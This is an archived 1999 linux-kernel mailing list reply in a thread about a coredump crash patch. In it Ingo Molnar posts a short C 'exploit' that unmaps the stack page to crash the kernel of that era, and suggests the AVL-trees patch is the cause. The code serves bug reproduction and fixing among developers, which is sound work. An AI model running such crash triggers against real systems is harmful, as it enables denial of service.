Re: [patch] 'coredump crash' fixed

MOLNAR Ingo (mingo@chiara.csoma.elte.hu)
Wed, 27 Jan 1999 14:18:19 +0100 (CET)

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Christian Groessler: "Re: ESS688: no go in pre(89)"
Previous message: Guest section DW: "Re: PROBLEM: Kernel 2.2.0 destroyed filesystem"

theres a much simpler exploit for those interested:

#include <unistd.h>
#include <sys/mman.h>

void main (void)
{
munmap((void*)0xbffff000, 4096);
}

(the ld-so exploit had this unmap hidden implicitly in an mmap(), not
necessarily obvious at first sight.)

-- Ingo 'now where is that bag construction kit' Molnar

ps. there might be similar bugs nearby, i have not yet checked. I guess
this whole thing is a side-effect of the AVL-trees patch, it might be
wise to recheck that patch.

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/

Next message: Christian Groessler: "Re: ESS688: no go in pre(89)"
Previous message: Guest section DW: "Re: PROBLEM: Kernel 2.2.0 destroyed filesystem"